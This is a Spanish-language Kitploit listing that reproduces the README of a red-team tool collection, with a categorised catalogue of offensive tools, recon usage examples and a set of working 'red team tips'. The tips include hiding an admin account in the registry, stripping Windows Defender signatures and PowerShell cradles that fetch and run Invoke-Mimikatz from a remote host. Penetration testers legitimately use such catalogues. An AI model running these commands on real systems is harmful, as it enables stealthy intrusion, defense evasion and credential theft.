Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Hack Tools — Proyecto que reúne varias herramientas de pentest | Kitploit
Herramientas/GitLabGitLab/edu0x01/hack-tools
Herramientas DefensivasHerramientas de PhishingEscalada de PrivilegiosReconocimientoFrameworks de ExploitsMovimiento LateralPruebas de PenetraciónComando y ControlAprendizaje y EducaciónRed TeamingRecursos CuradosDesarrollo de Payloads
28hace 2 añosAún no revisado
GitLabedu0x01/hack-tools

Hack Tools

Proyecto que reúne varias herramientas de pentest

Ver RepositorioSitio web

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Herramientas de Hacking

Este repositorio contiene una colección de 200+ herramientas y recursos que pueden ser útiles para actividades de red team.

Algunas herramientas pueden estar diseñadas específicamente para red team, mientras que otras son de uso general y pueden adaptarse para su uso en un contexto de red team.

Advertencia

Los materiales en este repositorio son solo para fines informativos y educativos. No están destinados para su uso en actividades ilegales.

Nota

Ocultar los encabezados de la lista de herramientas con la flecha.

Haga clic en 🔙 para volver a la lista.

Comando para clonar```bash

git submodule update --init --recursive

root@kitploit:~
### Agregar nuevo proyecto```bash
git submodule add https://github.com/example.git

docs: https://git-scm.com/book/en/v2/Git-Tools-Submodules

Lista de Herramientas

Consejos de Red Team $\textcolor{gray}{\text{13 consejos}}$
Descargar herramienta
  • Ocultar la cuenta de administrador local @Alh4zr3d
  • Inhabilitar Windows Defender eliminando firmas @Alh4zr3d
  • Habilitar múltiples sesiones de RDP por usuario @Alh4zr3d
  • Alternativa local a Sysinternals PsExec.exe @GuhnooPlusLinux
  • Escáner de puertos sin herramientas externas @Alh4zr3d
  • PowerShell DownloadString compatible con proxy @Alh4zr3d
  • Buscar endpoints internos en marcadores del navegador @Alh4zr3d
  • Consultar registros DNS para enumeración @Alh4zr3d
  • Rutas de servicio sin comillas sin PowerUp @Alh4zr3d
  • Bypass de un símbolo del sistema deshabilitado con /k Martin Sohn Christensen
  • Evitar que Windows Defender elimine mimikatz.exe @GuhnooPlusLinux
  • Comprobar si estás en una máquina virtual @dmcxblue
  • Enumerar reglas de AppLocker @Alh4zr3d
Reconocimiento $\textcolor{gray}{\text{20 herramientas}}$
    • crt.sh -> httprobe -> EyeWitness Captura de pantalla automatizada de dominios
    • jsendpoints Extraer enlaces DOM de la página
    • nuclei Escáner de vulnerabilidades
    • certSniff Sniffer de palabras clave en registros de transparencia de certificados
    • gobuster Fuerza bruta de rutas web
    • feroxbuster Herramienta rápida de descubrimiento de contenido escrita en Rust
    • CloudBrute Fuerza bruta de infraestructura en la nube
    • dnsrecon Enumerar registros DNS
    • Shodan.io Base de conocimiento de sistemas públicos
    • AORT (All in One Recon Tool) Enumeración de subdominios
    • spoofcheck Verificador de registros SPF/DMARC
    • AWSBucketDump Enumeración de buckets S3
    • GitHarvester Buscador de credenciales en GitHub
    • truffleHog Escáner de credenciales en GitHub
    • Dismap Descubrimiento/identificación de activos
    • enum4linux Enumeración de Windows/Samba
    • skanuvaty Escáner de DNS/red/puertos peligrosamente rápido
    • Metabigor Herramienta OSINT sin API
    • Gitrob Escáner de información sensible en GitHub
    • gowitness Utilidad de captura de pantalla web usando Chrome Headless
Desarrollo de Recursos $\textcolor{gray}{\text{8 herramientas}}$
    • Chimera Ofuscación de PowerShell
    • msfvenom Creación de payloads
    • Shellter Herramienta de inyección dinámica de shellcode
    • Freeze Creación de payloads (evasión de EDR)
    • WordSteal Robar hashes NTML con Microsoft Word
    • WSH Payload WSH
    • HTA Payload HTA
    • VBA Payload VBA
Acceso Inicial $\textcolor{gray}{\text{6 herramientas}}$
    • Bash Bunny Herramienta de ataque USB
    • EvilGoPhish Framework de campañas de phishing
    • The Social-Engineer Toolkit Framework de campañas de phishing
    • Hydra Herramienta de fuerza bruta
    • SquarePhish Framework de phishing OAuth/código QR
    • King Phisher Framework de campañas de phishing
Ejecución $\textcolor{gray}{\text{12 herramientas}}$
    • Responder Envenenador de LLMNR, NBT-NS y MDNS
    • secretsdump Volcador remoto de hashes
    • evil-winrm Shell WinRM
    • Donut Ejecución en memoria de .NET
    • Macro_pack Ofuscación de macros
    • PowerSploit Suite de scripts PowerShell
    • Rubeus Herramienta de hackeo de Active Directory
    • SharpUp Identificador de vulnerabilidades en Windows
    • SQLRecon Toolkit ofensivo para MS-SQL
    • UltimateAppLockerByPassList Técnicas comunes de bypass de AppLocker
    • StarFighters Lanzador de Empire basado en JavaScript y VBScript
    • demiguise Herramienta de cifrado de HTA
Persistencia $\textcolor{gray}{\text{4 herramientas}}$
    • Impacket Suite de scripts Python
    • Empire Framework de post-explotación
    • SharPersist Toolkit de persistencia en Windows
    • ligolo-ng Herramienta de tunelización que usa una interfaz TUN
Escalada de Privilegios $\textcolor{gray}{\text{9 herramientas}}$
    • LinPEAS Escalada de privilegios en Linux
    • WinPEAS Escalada de privilegios en Windows
    • linux-smart-enumeration Escalada de privilegios en Linux
    • Certify Escalada de privilegios en Active Directory
    • Get-GPPPassword Extracción de contraseñas en Windows
    • Sherlock Herramienta de escalada de privilegios en PowerShell
    • Watson Herramienta de escalada de privilegios en Windows
    • ImpulsiveDLLHijack Herramienta de secuestro de DLL
    • ADFSDump Herramienta de volcado de AD FS
EvasIón de Defensas $\textcolor{gray}{\text{5 herramientas}}$
    • Invoke-Obfuscation Ofuscador de scripts
    • Veil Ofuscador de payloads de Metasploit
    • SharpBlock Bypass de EDR mediante prevención de ejecución en el punto de entrada
    • Alcatraz Ofuscador de binarios x64 con interfaz gráfica
    • Mangle Manipulación de ejecutables compilados
    • AMSI Fail Fragmentos de PowerShell que rompen o deshabilitan AMSI
Acceso a Credenciales $\textcolor{gray}{\text{9 herramientas}}$
    • Mimikatz Extractor de credenciales de Windows
    • LaZagne Extractor local de contraseñas
    • hashcat Craqueo de hashes de contraseñas
    • John the Ripper Craqueo de hashes de contraseñas
    • SCOMDecrypt Herramienta de descifrado de credenciales SCOM
    • nanodump Creación de minidumps del proceso LSASS
    • eviltree Remake de tree para descubrimiento de credenciales
    • SeeYouCM-Thief Parseo de archivos de configuración de sistemas telefónicos Cisco
    • MailSniper Buscador de correos en Microsoft Exchange
Descubrimiento $\textcolor{gray}{\text{6 herramientas}}$
    • PCredz Descubrimiento de credenciales en PCAP/interfaz en vivo
    • PingCastle Evaluador de Active Directory
    • Seatbelt Escáner local de vulnerabilidades
    • ADRecon Reconocimiento de Active Directory
    • adidnsdump Volcado de DNS integrado de Active Directory
    • scavenger Herramienta de escaneo para sistemas de recolección
Movimiento Lateral $\textcolor{gray}{\text{12 herramientas}}$
    • crackmapexec Toolkit de movimiento lateral en Windows/Active Directory
    • WMIOps Comandos remotos WMI
    • PowerLessShell PowerShell remoto sin PowerShell
    • PsExec Reemplazo ligero de telnet
    • LiquidSnake Movimiento lateral sin archivos
    • Habilitar RDP Comando para habilitar RDP en Windows
    • Actualizar shell a meterpreter Mejora de reverse shell
    • Reenvío de puertos Comando de reenvío de puertos local
    • Reverse shell en Jenkins Comando de shell en Jenkins
    • ADFSpoof Forjar tokens de seguridad de AD FS
    • kerbrute Herramienta para realizar fuerza bruta de pre-autenticación Kerberos
    • Coercer Coaccionar a un servidor Windows para que se autentique
Recopilación $\textcolor{gray}{\text{3 herramientas}}$
    • BloodHound Visualización de Active Directory
    • Snaffler Recolector de credenciales de Active Directory
    • linWinPwn Enumeración y comprobación de vulnerabilidades de Active Directory
Comando y Control $\textcolor{gray}{\text{6 herramientas}}$
    • Havoc Framework de comando y control
    • Covenant Framework de comando y control (.NET)
    • Merlin Framework de comando y control (Golang)
    • Metasploit Framework Framework de comando y control (Ruby)
    • Pupy Framework de comando y control (Python)
    • Brute Ratel Framework de comando y control ($$$)
Exfiltración $\textcolor{gray}{\text{5 herramientas}}$
    • Dnscat2 C2 mediante túnel DNS
    • Cloakify Transformación de datos para exfiltración
    • PyExfil Prueba de concepto de exfiltración de datos
    • Powershell RAT Backdoor basado en Python
    • GD-Thief Exfiltración de Google Drive
Impacto $\textcolor{gray}{\text{3 herramientas}}$
    • Filtración de la Guía de Pentester de Conti Toolkit de afiliados del grupo de ransomware Conti
    • SlowLoris Denegación de servicio simple
    • usbkill Interruptor de seguridad anti-forense

Consejos de Red Team

Aprende de los Red Teamers con una colección de Consejos de Red Teaming. Estos consejos cubren una variedad de tácticas, herramientas y metodologías para mejorar tus habilidades de red teaming.

Nota: Casi todos los consejos son actualmente de @Alh4zr3d, ¡él publica buenos Consejos de Red Team!

🔙Ocultar la cuenta de administrador local```bash

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /v alh4zr3d /d 0 /f

root@kitploit:~
**Descripción:** _'Crear cuentas es arriesgado al evadir al equipo azul, pero al crear un administrador local, usa un poco de hechicería en el registro para ocultarlo.'_

**Crédito:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**Enlace:** [Twitter](https://twitter.com/Alh4zr3d/status/1612913838999113728)

### [🔙](#tool-list)Inutilizar Windows Defender eliminando firmas```bash
"%Program Files%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

Description: 'Un poco desordenado, pero si Windows Defender te está causando un gran dolor de cabeza, en lugar de deshabilitarlo (lo que alerta al usuario), deberías simplemente neutralizarlo eliminando todas las firmas.'

Credit: @Alh4zr3d

Link: Twitter

🔙Habilitar múltiples sesiones RDP por usuario```bash

reg add HKLM\System\CurrentControlSet\Control\TerminalServer /v fSingleSessionPerUser /d 0 /f

root@kitploit:~
**Descripción:** _'A veces quieres iniciar sesión en un host mediante RDP o similar, pero tu usuario tiene una sesión activa. Habilita múltiples sesiones por usuario.'_

**Crédito:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**Enlace:** [Twitter](https://twitter.com/Alh4zr3d/status/1609954528425558016)

### [🔙](#tool-list)Alternativa local a Sysinternals PsExec.exe```bash
wmic.exe /node:10.1.1.1 /user:username /password:pass process call create cmd.exe /c " command "

Descripción: '¿Estás cansado de subir Sysinternals PsExec.exe al realizar movimiento lateral? Windows tiene una mejor alternativa preinstalada. Prueba esto en su lugar.'

Crédito: @GuhnooPlusLinux

Enlace: Twitter

🔙Escáner de puertos «live off the land»```bash

0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(<tgt_ip>,$)) "Port $ open"} 2>$null

root@kitploit:~
**Descripción:** _'Cuando sea posible, vive de la tierra en lugar de subir herramientas a las máquinas (por muchas razones). PowerShell/.NET ayuda. Ej: escáner de puertos simple en PowerShell.'_

**Crédito:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**Enlace:** [Twitter](https://twitter.com/Alh4zr3d/status/1605060950339588096)

### [🔙](#tool-list)Proxy aware PowerShell DownloadString```bash
$w=(New-Object Net.WebClient);$w.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $w.DownloadString("<url>")

Descripción: 'La mayoría de las grandes organizaciones utilizan proxies web hoy en día. La cuna de descarga estándar de PowerShell no es consciente del proxy. Usa esta.'

Crédito: @Alh4zr3d

Enlace: Twitter

🔙Buscando endpoints internos en marcadores del navegador```bash

type "C:\Users%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks.bak" | findstr /c "name url" | findstr /v "type"

root@kitploit:~
**Descripción:** _'Te sorprendería lo que puedes descubrir solo con los marcadores de un usuario. Puntos de acceso internos a los que pueden acceder, por ejemplo.'_

**Crédito:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**Enlace:** [Twitter](https://twitter.com/Alh4zr3d/status/1595488676389171200)

### [🔙](#tool-list)Consultar registros DNS para enumeración```bash
Get-DnsRecord -RecordType A -ZoneName FQDN -Server <server hostname>

Descripción: 'La enumeración es el 95% del juego. Sin embargo, lanzar toneladas de escaneos para evaluar el entorno es muy ruidoso. ¿Por qué no simplemente preguntar al servidor DC/DNS por todos los registros DNS?'

Crédito: @Alh4zr3d

Enlace: Twitter

🔙Unquoted service paths without PowerUp```bash

Get-CIMInstance -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$.StartMode -eq "Auto" -and $.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name

root@kitploit:~
**Descripción:** _'Encontrar rutas de servicio sin comillas sin PowerUp'_

**Crédito:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**Enlace:** [Twitter](https://twitter.com/Alh4zr3d/status/1579254955554136064)

### [🔙](#tool-list)Evitar un símbolo del sistema deshabilitado con /k```bash
# Win+R (To bring up Run Box)
cmd.exe /k "whoami"

Descripción: 'Este símbolo del sistema ha sido deshabilitado por su administrador...' Generalmente se puede ver en entornos como PCs de quioscos, una solución rápida y poco ortodoxa es usar /k a través del cuadro de ejecución de Windows. Esto ejecutará el comando y luego mostrará el mensaje de restricción, permitiendo la ejecución de comandos.

Crédito: Martin Sohn Christensen

Enlace: Blog

🔙Evitar que Windows Defender elimine mimikatz.exe```bash

(new-object net.webclient).downloadstring('https://raw.githubusercontent[.]com/BC-SECURITY/Empire/main/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1')|IEX;inv

root@kitploit:~
**Descripción:** _'¿Estás cansado de que Windows Defender elimine mimikatz.exe? Prueba esto en su lugar.'_

**Crédito:** [@GuhnooPlusLinux](https://twitter.com/GuhnooPlusLinux)

**Enlace:** [Twitter](https://twitter.com/GuhnooPlusLinux/status/1605629049660809216)

### [🔙](#tool-list)Comprueba si estás en una máquina virtual```bash
reg query HKLM\SYSTEM /s | findstr /S "VirtualBox VBOX VMWare"

Descripción: '¿Quieres saber si estás en una Máquina Virtual? ¡Consulta las claves del registro y descúbrelo! Si aparece algún resultado, estás en una Máquina Virtual.'

Crédito: @dmcxblue

Enlace: Twitter

🔙Enumerar reglas de AppLocker```

(Get-AppLockerPolicy -Local).RuleCollections

Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\SrpV2 -Recurse

reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\

root@kitploit:~
**Descripción:** _'AppLocker puede ser un dolor. Enumera para ver cuán doloroso es'_

**Créditos:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)

**Enlace:** [Twitter](https://twitter.com/alh4zr3d/status/1614706476412698624)

# Reconocimiento

### [🔙](#tool-list)crt.sh -> httprobe -> EyeWitness

He preparado un one-liner de bash que:

- Recopila pasivamente una lista de subdominios a partir de asociaciones de certificados ([crt.sh](https://crt.sh/))
- Solicita activamente cada subdominio para verificar su existencia ([httprobe](https://github.com/tomnomnom/httprobe))
- Captura activamente una captura de pantalla de cada subdominio para revisión manual ([EyeWitness](https://github.com/FortyNorthSecurity/EyeWitness))

**Uso:**```bash
domain=DOMAIN_COM;rand=$RANDOM;curl -fsSL "https://crt.sh/?q=${domain}" | pup 'td text{}' | grep "${domain}" | sort -n | uniq | httprobe > /tmp/enum_tmp_${rand}.txt; python3 /usr/share/eyewitness/EyeWitness.py -f /tmp/enum_tmp_${rand}.txt --web

Nota: Debes tener httprobe, pup y EyeWitness instalados y cambiar 'DOMAIN_COM' por el dominio objetivo. Puedes ejecutar este script concurrentemente en ventanas de terminal si tienes múltiples dominios raíz objetivo.

image

image

🔙jsendpoints

Un bookmarklet de JavaScript para extraer todos los enlaces de endpoint de una página web.

Creado por @renniepak, este fragmento de código JavaScript se puede usar para extraer todos los endpoints (que comienzan con /) del DOM de la página web actual, incluyendo todas las fuentes de scripts externos incrustados en la página.```javascript javascript: (function () { var scripts = document.getElementsByTagName("script"), regex = /(?<=("|'|`))/[a-zA-Z0-9_?&=/-#.]*(?=("|'|`))/g; const results = new Set(); for (var i = 0; i < scripts.length; i++) { var t = scripts[i].src; "" != t && fetch(t) .then(function (t) { return t.text(); }) .then(function (t) { var e = t.matchAll(regex); for (let r of e) results.add(r[0]); }) .catch(function (t) { console.log("An error occurred: ", t); }); } var pageContent = document.documentElement.outerHTML, matches = pageContent.matchAll(regex); for (const match of matches) results.add(match[0]); function writeResults() { results.forEach(function (t) { document.write(t + "
"); }); } setTimeout(writeResults, 3e3); })();

root@kitploit:~
**Uso (Bookmarklet)**

Crea un marcador...

- `Haz clic derecho en tu barra de marcadores`
- `Haz clic en 'Añadir página'`
- `Pega el Javascript anterior en el cuadro 'url'`
- `Haz clic en 'Guardar'`

...luego visita la página víctima en el navegador y haz clic en el marcador.

![image](https://assets.kitploit.com/production/public/readmes/495/a2a9b8ff2cacdcf419b64a6d99075dffa73471eea1201fb9a0a6b2524794849f.png)

**Uso (Consola)**

Pega el Javascript anterior en la ventana de la consola `F12` y presiona Enter.

![image](https://assets.kitploit.com/production/public/readmes/495/5dd2a02f0f6874c521b8a98f35f653b1cf1a13b00a4c7e3eaf7c111700c0cc8a.png)

### [🔙](#tool-list)[nuclei](https://github.com/projectdiscovery/nuclei)

Escáner de vulnerabilidades rápido que utiliza plantillas .yaml para buscar problemas específicos.

**Instalación:**```bash
go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest

Uso:```bash cat domains.txt | nuclei -t /PATH/nuclei-templates/

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/a747b7be6260c2a228ac90ac4c3500debb25dd3bf1f635c5ce736159cdd7bc81.png)

### [🔙](#tool-list)[nuclei-templates](https://github.com/projectdiscovery/nuclei-templates.git)

<h1 align="center">
Nuclei Templates
</h1>
<h4 align="center">Lista de plantillas seleccionadas por la comunidad para el motor nuclei con el fin de encontrar vulnerabilidades de seguridad en aplicaciones.</h4>

<p align="center">
<a href="https://github.com/projectdiscovery/nuclei-templates/issues"><img src="https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat"></a>
<a href="https://github.com/projectdiscovery/nuclei-templates/releases"><img src="https://img.shields.io/github/release/projectdiscovery/nuclei-templates"></a>
<a href="https://twitter.com/pdnuclei"><img src="https://img.shields.io/twitter/follow/pdnuclei.svg?logo=twitter"></a>
<a href="https://discord.gg/projectdiscovery"><img src="https://img.shields.io/discord/695645237418131507.svg?logo=discord"></a>
</p>
      
<p align="center">
  <a href="https://nuclei.projectdiscovery.io/templating-guide/">Documentación</a> •
  <a href="#-contributions">Contribuciones</a> •
  <a href="#-discussion">Discusión</a> •
  <a href="#-community">Comunidad</a> •
  <a href="https://nuclei.projectdiscovery.io/faq/templates/">Preguntas frecuentes</a> •
  <a href="https://discord.gg/projectdiscovery">Unirse a DC</a>
</p>

---

Las plantillas son el núcleo del [escáner nuclei](https://github.com/projectdiscovery/nuclei) que impulsa el motor de escaneo real.
Este repositorio almacena y alberga varias plantillas para el escáner proporcionadas por nuestro equipo, así como aportadas por la comunidad.
Esperamos que también contribuyas enviando plantillas mediante **pull requests** o [issues de Github](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) para hacer crecer la lista.

## Resumen de Nuclei Templates

Una visión general del proyecto de plantillas nuclei, incluyendo estadísticas sobre etiquetas únicas, autor, directorio, severidad y tipo de plantillas. La tabla a continuación contiene las diez principales estadísticas para cada matriz; una versión ampliada de esto está [disponible aquí](https://gitlab.com/edu0x01/hack-tools/-/blob/master/TEMPLATES-STATS.md), y también disponible en formato [JSON](https://gitlab.com/edu0x01/hack-tools/-/blob/master/TEMPLATES-STATS.json) para integración.

<table>
<tr>
<td>

## Estadísticas Top 10 de Nuclei Templates

| ETIQUETA  | CONTEO | AUTOR        | CONTEO | DIRECTORIO          | CONTEO | SEVERIDAD | CONTEO | TIPO | CONTEO |
| --------- | ------ | ------------ | ------ | ------------------- | ------ | --------- | ------ | ---- | ------ |
| cve       | 1855   | dhiyaneshdk  | 835    | http                | 5860   | info      | 2857   | file | 123    |
| panel     | 896    | dwisiswant0  | 794    | workflows           | 190    | high      | 1270   | dns  | 18     |
| wordpress | 781    | daffainfo    | 664    | file                | 123    | medium    | 1042   |      |        |
| exposure  | 677    | pikpikcu     | 353    | network             | 93     | critical  | 704    |      |        |
| wp-plugin | 672    | pdteam       | 278    | dns                 | 18     | low       | 216    |      |        |
| xss       | 646    | pussycat0x   | 240    | ssl                 | 12     | unknown   | 26     |      |        |
| osint     | 639    | geeknik      | 220    | headless            | 9      |           |        |      |        |
| tech      | 602    | ricardomaia  | 215    | TEMPLATES-STATS.json | 1     |           |        |      |        |
| edb       | 596    | ritikchaddha | 210    | contributors.json   | 1      |           |        |      |        |
| lfi       | 548    | 0x_akoko     | 179    | cves.json           | 1      |           |        |      |        |

**404 directorios, 6542 archivos**.

</td>
</tr>
</table>

## 📖 Documentación

Por favor, navega a https://nuclei.projectdiscovery.io para obtener documentación detallada para **construir** plantillas nuevas o **personalizadas**.
También hemos añadido un conjunto de plantillas para ayudarte a entender cómo funcionan las cosas.

## 💪 Contribuciones

Nuclei-templates está impulsado por importantes contribuciones de la comunidad.
Las [contribuciones de plantillas](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [solicitudes de funciones](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) e [informes de errores](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) son más que bienvenidos.

![Alt](https://repobeats.axiom.co/api/embed/55ee65543bb9a0f9c797626c4e66d472a517d17c.svg "Imagen de analíticas de Repobeats")

## 💬 Discusión

¿Tienes preguntas / dudas / ideas para discutir?
Siéntete libre de abrir una discusión en el tablero de [discusiones de Github](https://github.com/projectdiscovery/nuclei-templates/discussions).

## 👨‍💻 Comunidad

Estás invitado a unirte a la activa [Comunidad de Discord](https://discord.gg/projectdiscovery) para discutir directamente con los mantenedores del proyecto y compartir cosas con otros sobre seguridad y automatización.
Adicionalmente, puedes seguirnos en [Twitter](https://twitter.com/pdnuclei) para estar al tanto de todo lo relacionado con Nuclei.

<p align="center">
<a href="https://github.com/projectdiscovery/nuclei-templates/graphs/contributors">
  <img src="https://contrib.rocks/image?repo=projectdiscovery/nuclei-templates&amp;max=300">
</a>
</p>

Gracias de nuevo por tu contribución por mantener esta comunidad vibrante. :heart:

### [🔙](#tool-list)[certSniff](https://github.com/A-poc/certSniff)

certSniff es un monitor de palabras clave de registros de transparencia de certificados que escribí en Python. Utiliza la biblioteca certstream para observar registros de creación de certificados que contengan palabras clave, definidas en un archivo.

Puedes poner esto en funcionamiento con varias palabras clave relacionadas con tu dominio víctima; cualquier creación de certificado será registrada y puede llevar al descubrimiento de dominios que antes desconocías.

**Instalación:**```bash
git clone https://github.com/A-poc/certSniff;cd certSniff/;pip install -r requirements.txt

Uso:```python python3 certSniff.py -f example.txt

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/5cfb98ddfd270f9f57aa774a49dd21ee41ae79bbf430e012834e9c85cf221c5e.png)

### [🔙](#tool-list)[gobuster](https://www.kali.org/tools/gobuster/)

Buena herramienta para forzar rutas de archivos/carpetas en un sitio web víctima.

**Instalación:**```bash
sudo apt install gobuster

Uso:```bash gobuster dir -u "https://google.com" -w /usr/share/wordlists/dirb/big.txt --wildcard -b 301,401,403,404,500 -t 20

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/49bbb3fa465f423a5b3fa1dbe2468cb9c70ad4600532825a759da5b911a2c890.png)

### [🔙](#tool-list)[feroxbuster](https://github.com/epi052/feroxbuster)

Una herramienta diseñada para realizar Forced Browsing, un ataque cuyo objetivo es enumerar y acceder a recursos que no están referenciados por la aplicación web, pero que aún son accesibles por un atacante.

Feroxbuster utiliza fuerza bruta combinada con una wordlist para buscar contenido no enlazado en directorios objetivo. Estos recursos pueden almacenar información sensible sobre aplicaciones web y sistemas operativos, como código fuente, credenciales, direccionamiento de red interna, etc.

**Instalación: (Kali)**```bash
sudo apt update && sudo apt install -y feroxbuster

Instalar: (Mac)```bash curl -sL https://raw.githubusercontent.com/epi052/feroxbuster/master/install-nix.sh | bash

root@kitploit:~
**Instalación: (Windows)**```bash
Invoke-WebRequest https://github.com/epi052/feroxbuster/releases/latest/download/x86_64-windows-feroxbuster.exe.zip -OutFile feroxbuster.zip
Expand-Archive .\feroxbuster.zip
.\feroxbuster\feroxbuster.exe -V

Para instrucciones completas de instalación, consulta aquí.

Uso:```bash

Add .pdf, .js, .html, .php, .txt, .json, and .docx to each url

./feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx

Scan with headers

./feroxbuster -u http://127.1 -H Accept:application/json "Authorization: Bearer {token}"

Read URLs from stdin

cat targets | ./feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files

Proxy requests through burpsuite

./feroxbuster -u http://127.1 --insecure --proxy http://127.0.0.1:8080

root@kitploit:~
Los ejemplos completos de uso se pueden encontrar [aquí](https://epi052.github.io/feroxbuster-docs/docs/examples/).

![Imagen](https://assets.kitploit.com/production/public/readmes/495/bddd1a012eb92f79a03b1f6dd3cb9f31a9b0751776541044adcf234332421a08.png)

_Imagen utilizada de https://raw.githubusercontent.com/epi052/feroxbuster/main/img/demo.gif_

### [🔙](#tool-list)[CloudBrute](https://github.com/0xsha/CloudBrute)

Una herramienta para encontrar la infraestructura, archivos y aplicaciones de una empresa (objetivo) en los principales proveedores de la nube (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode).

Características:

- Detección de la nube (API de IPINFO y Código fuente)
- Rápido (concurrente)
- Multiplataforma (Windows, Linux, Mac)
- Aleatorización de User-Agent
- Aleatorización de Proxy (HTTP, Socks5)

**Instalación:**

Descarga la última [versión](https://github.com/0xsha/CloudBrute/releases) para tu sistema y sigue las instrucciones de uso.

**Uso:**```bash
# Specified target, generate keywords based off 'target', 80 threads with a timeout of 10, wordlist 'storage_small.txt'
CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"

# Output results to file
CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt

image

Imagen utilizada de https://github.com/0xsha/CloudBrute

🔙dnsrecon

dnsrecon es una herramienta pyhton para enumerar registros DNS (MX, SOA, NS, A, AAAA, SPF y TXT) y puede proporcionar una serie de nuevos hosts víctimas asociados desde los cuales pivotar a partir de una búsqueda de un solo dominio.

Instalación:```bash sudo apt install dnsrecon

root@kitploit:~
**Uso:**```bash
dnsrecon -d google.com

image

🔙shodan.io

Shodan rastrea la infraestructura pública y la muestra en un formato buscable. Utilizando un nombre de empresa, nombre de dominio o dirección IP es posible descubrir sistemas potencialmente vulnerables relacionados con tu objetivo a través de shodan.

image

🔙AORT

Herramienta para enumerar subdominios, enumerar DNS, detección de WAF, WHOIS, escaneo de puertos, wayback machine, recolección de correos electrónicos.

Instalación:```bash git clone https://github.com/D3Ext/AORT; cd AORT; pip3 install -r requirements.txt

root@kitploit:~
**Uso:**```python
python3 AORT.py -d google.com

image

🔙spoofcheck

Un programa que comprueba si un dominio puede ser suplantado. El programa revisa los registros SPF y DMARC en busca de configuraciones débiles que permitan la suplantación. Además, alertará si el dominio tiene una configuración DMARC que envía correos o solicitudes HTTP en correos electrónicos que fallan en SPF/DKIM.

Los dominios son suplantables si se cumple alguna de las siguientes condiciones:

  • Falta de un registro SPF o DMARC
  • El registro SPF nunca especifica ~all o -all
  • La política DMARC está configurada como p=none o no existe

Instalación:```bash git clone https://github.com/BishopFox/spoofcheck; cd spoofcheck; pip install -r requirements.txt

root@kitploit:~
**Uso:**```bash
./spoofcheck.py [DOMAIN]

image

🔙AWSBucketDump

AWSBucketDump es una herramienta para enumerar rápidamente los buckets de AWS S3 y buscar archivos interesantes. Es similar a un bruteforcer de subdominios pero está hecho específicamente para buckets S3 y también tiene algunas características adicionales que te permiten hacer grep de archivos, así como descargar archivos interesantes.

Instalación:``` git clone https://github.com/jordanpotti/AWSBucketDump; cd AWSBucketDump; pip install -r requirements.txt

root@kitploit:~
**Uso:**```
usage: AWSBucketDump.py [-h] [-D] [-t THREADS] -l HOSTLIST [-g GREPWORDS] [-m MAXSIZE]

optional arguments:
  -h, --help    show this help message and exit
  -D            Download files. This requires significant diskspace
  -d            If set to 1 or True, create directories for each host w/ results
  -t THREADS    number of threads
  -l HOSTLIST
  -g GREPWORDS  Provide a wordlist to grep for
  -m MAXSIZE    Maximum file size to download.

 python AWSBucketDump.py -l BucketNames.txt -g interesting_Keywords.txt -D -m 500000 -d 1

🔙GitHarvester

Buena herramienta para encontrar información de GitHub con expresiones regulares, con la capacidad de buscar usuarios y/o proyectos específicos de GitHub.

Instalación:``` git clone https://github.com/metac0rtex/GitHarvester; cd GitHarvester

root@kitploit:~
**Uso:**```
./githarvester.py

🔙truffleHog

TruffleHog es una herramienta que escanea repositorios git y busca cadenas de alta entropía y patrones que puedan indicar la presencia de secretos, como contraseñas y claves API. Con TruffleHog, puedes encontrar de manera rápida y sencilla información sensible que pueda haber sido confirmada y subida accidentalmente a un repositorio.

Instalación (Binarios): Enlace

Instalación (Go):``` git clone https://github.com/trufflesecurity/trufflehog.git; cd trufflehog; go install

root@kitploit:~
**Uso:**```
trufflehog https://github.com/trufflesecurity/test_keys

image

🔙Dismap

